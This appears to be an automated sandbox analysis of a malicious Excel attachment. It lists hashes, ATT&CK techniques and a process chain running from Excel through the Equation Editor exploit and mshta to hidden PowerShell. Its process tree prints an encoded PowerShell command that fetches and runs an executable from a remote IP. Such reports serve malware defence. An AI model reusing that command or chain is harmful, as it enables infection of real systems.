193fe8c9f0b3ba4a43ae50b0217407410e29c0d2939396433f3bfaaa062ca3cf

General

Target

CIPLCOACOOQCET230428GOxls.xls
Size

209KB
MD5

36c189f80d7ea1d308f10ecc0091c1c2
SHA1

a789b6fdb3c1361aa29213ee05cf21c5644f5d28
SHA256

193fe8c9f0b3ba4a43ae50b0217407410e29c0d2939396433f3bfaaa062ca3cf
SHA512

b60756afd3a7ccf35ab25b561f415107a887bce7e75a676e546fafffbdef1effc50ca16a3adc110d6072268f0b78d1edfb31a6e75395861c543fd0ae02bbaaab
SSDEEP

6144:FZ+RwPONXoRjDhIcp0fDlavx+W26nA/qvBhBi0pnRrk5jMVWltEg0S:DvZi4rkKVWlOZS

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
3	660	EQNEDT32.EXE

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	PoWErsheLl.EXe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Launches Equation Editor 1 TTPs 1 IoCs

Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

exploit

Exploitation for Client Execution

T1203

pid	Process
660	EQNEDT32.EXE

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1724861073-2584418204-2594431177-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2356	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2120	PoWErsheLl.EXe
3012	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2120	PoWErsheLl.EXe
Token: SeDebugPrivilege	3012	powershell.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
2356	EXCEL.EXE
2356	EXCEL.EXE
2356	EXCEL.EXE
2356	EXCEL.EXE
2356	EXCEL.EXE

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 660 wrote to memory of 1480	660	EQNEDT32.EXE	31
PID 660 wrote to memory of 1480	660	EQNEDT32.EXE	31
PID 660 wrote to memory of 1480	660	EQNEDT32.EXE	31
PID 660 wrote to memory of 1480	660	EQNEDT32.EXE	31
PID 1480 wrote to memory of 2120	1480	mshta.exe	32
PID 1480 wrote to memory of 2120	1480	mshta.exe	32
PID 1480 wrote to memory of 2120	1480	mshta.exe	32
PID 1480 wrote to memory of 2120	1480	mshta.exe	32
PID 2120 wrote to memory of 3012	2120	PoWErsheLl.EXe	35
PID 2120 wrote to memory of 3012	2120	PoWErsheLl.EXe	35
PID 2120 wrote to memory of 3012	2120	PoWErsheLl.EXe	35
PID 2120 wrote to memory of 3012	2120	PoWErsheLl.EXe	35

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\CIPLCOACOOQCET230428GOxls.xls
1⤵
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2356

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:660
- C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\IE_Net.hta"
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of WriteProcessMemory
  PID:1480
- - C:\Windows\SysWOW64\wInDoWSPoWERSHELL\v1.0\PoWErsheLl.EXe
    "C:\Windows\sYstem32\wInDoWSPoWERSHELL\v1.0\PoWErsheLl.EXe" "PoweRSHell -eX BypASs -noP -w 1 -Ec IAAJAFsATgBFAFQALgBTAGUAUgBWAEkAYwBFAFAAbwBpAE4AdABtAEEAbgBhAEcARQByAF0AOgA6AFMAZQBDAFUAcgBpAHQAeQBwAFIAbwB0AG8AYwBPAGwAIAA9ACAACQBbAE4AZQB0AC4AcwBFAGMAVQBSAGkAVAB5AFAAcgBPAHQATwBjAG8AbABUAFkAcABlAF0AOgA6AFQAbABzADEAMgAgAAkAOwAgAAkAIAAJAFcARwBlAHQAIAAJACgAHSBIAHQAdABwADoALwAvADgAHSAgAAkAIAAJACsAIAAJAB0gNQAuADIAMQA3AC4AMQA0ADQALgA2ADEALwBtAB0gIAAJACAACQArACAACQAdIGUAHSAgAAkAIAAJACsAIAAJAB0gLgBlAB0gIAAJACAACQArACAACQAdIHgAZQAdICAACQApACAACQAtAE8AdQBUAEYASQBMAGUAIAAJAB0gJABlAE4AVgA6AFMAWQBTAFQAZQBNAFIATwBvAFQAXABpAGIAcwBfAEMAZQBuAHQAbwBzAGkALgBlAHgAZQAdICAACQA7ACAAUwBUAGEAcgB0ACAACQAdICQARQBuAHYAOgBzAFkAUwB0AGUATQBSAG8AbwBUAFwAaQBiAHMAXwBDAGUAbgB0AG8AcwBpAC4AZQB4AGUAHSA= "
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2120
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX BypASs -noP -w 1 -Ec IAAJAFsATgBFAFQALgBTAGUAUgBWAEkAYwBFAFAAbwBpAE4AdABtAEEAbgBhAEcARQByAF0AOgA6AFMAZQBDAFUAcgBpAHQAeQBwAFIAbwB0AG8AYwBPAGwAIAA9ACAACQBbAE4AZQB0AC4AcwBFAGMAVQBSAGkAVAB5AFAAcgBPAHQATwBjAG8AbABUAFkAcABlAF0AOgA6AFQAbABzADEAMgAgAAkAOwAgAAkAIAAJAFcARwBlAHQAIAAJACgAHSBIAHQAdABwADoALwAvADgAHSAgAAkAIAAJACsAIAAJAB0gNQAuADIAMQA3AC4AMQA0ADQALgA2ADEALwBtAB0gIAAJACAACQArACAACQAdIGUAHSAgAAkAIAAJACsAIAAJAB0gLgBlAB0gIAAJACAACQArACAACQAdIHgAZQAdICAACQApACAACQAtAE8AdQBUAEYASQBMAGUAIAAJAB0gJABlAE4AVgA6AFMAWQBTAFQAZQBNAFIATwBvAFQAXABpAGIAcwBfAEMAZQBuAHQAbwBzAGkALgBlAHgAZQAdICAACQA7ACAAUwBUAGEAcgB0ACAACQAdICQARQBuAHYAOgBzAFkAUwB0AGUATQBSAG8AbwBUAFwAaQBiAHMAXwBDAGUAbgB0AG8AcwBpAC4AZQB4AGUAHSA=
      4⤵
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3012

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Exploitation for Client Execution

1

T1203

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\IE_Net.hta

Filesize
3KB

MD5
a4669c48563c4f587213a691a9d4a8ec

SHA1
4350cf01028c28ca82ee6cf85ad6de5f45a4457b

SHA256
496f69468ef219b2b151c321c15157b11f61d280126fc4be5ff18971869df5a6

SHA512
0c319e0214e5f9b4e90fa81e976d88f83a87b35f57112d0cd0d3083e2c994775f75859cb5cc73052eac77eae2b2f2b4a94a0784bf4af3844080c764f0e4cb7c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\IE_Net.hta

Filesize
3KB

MD5
a4669c48563c4f587213a691a9d4a8ec

SHA1
4350cf01028c28ca82ee6cf85ad6de5f45a4457b

SHA256
496f69468ef219b2b151c321c15157b11f61d280126fc4be5ff18971869df5a6

SHA512
0c319e0214e5f9b4e90fa81e976d88f83a87b35f57112d0cd0d3083e2c994775f75859cb5cc73052eac77eae2b2f2b4a94a0784bf4af3844080c764f0e4cb7c5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LENX7WSN7QD7V85GXWGI.temp

Filesize
7KB

MD5
51fcc197abf65e62f6b5be985128bd3a

SHA1
55f49862cc4af41ed7ff4d9973ec0d118c46f019

SHA256
571b16ef64a376d980d71ecc6171d8ebdd94e1a8eaf9047c414c208110fa169f

SHA512
5dc9fa7efe28498155bae10661c66b3820ea59c67e6d7de3de9e453fadc22465547d9da40b48b5294f6666d2ff6fcf150e900f87e580da281410e60e4d7edc45

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
51fcc197abf65e62f6b5be985128bd3a

SHA1
55f49862cc4af41ed7ff4d9973ec0d118c46f019

SHA256
571b16ef64a376d980d71ecc6171d8ebdd94e1a8eaf9047c414c208110fa169f

SHA512
5dc9fa7efe28498155bae10661c66b3820ea59c67e6d7de3de9e453fadc22465547d9da40b48b5294f6666d2ff6fcf150e900f87e580da281410e60e4d7edc45

Download Submit
memory/2120-63-0x00000000025C0000-0x0000000002600000-memory.dmp

Filesize
256KB

Download
memory/2120-64-0x00000000025C0000-0x0000000002600000-memory.dmp

Filesize
256KB

Download
memory/2356-54-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2356-70-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing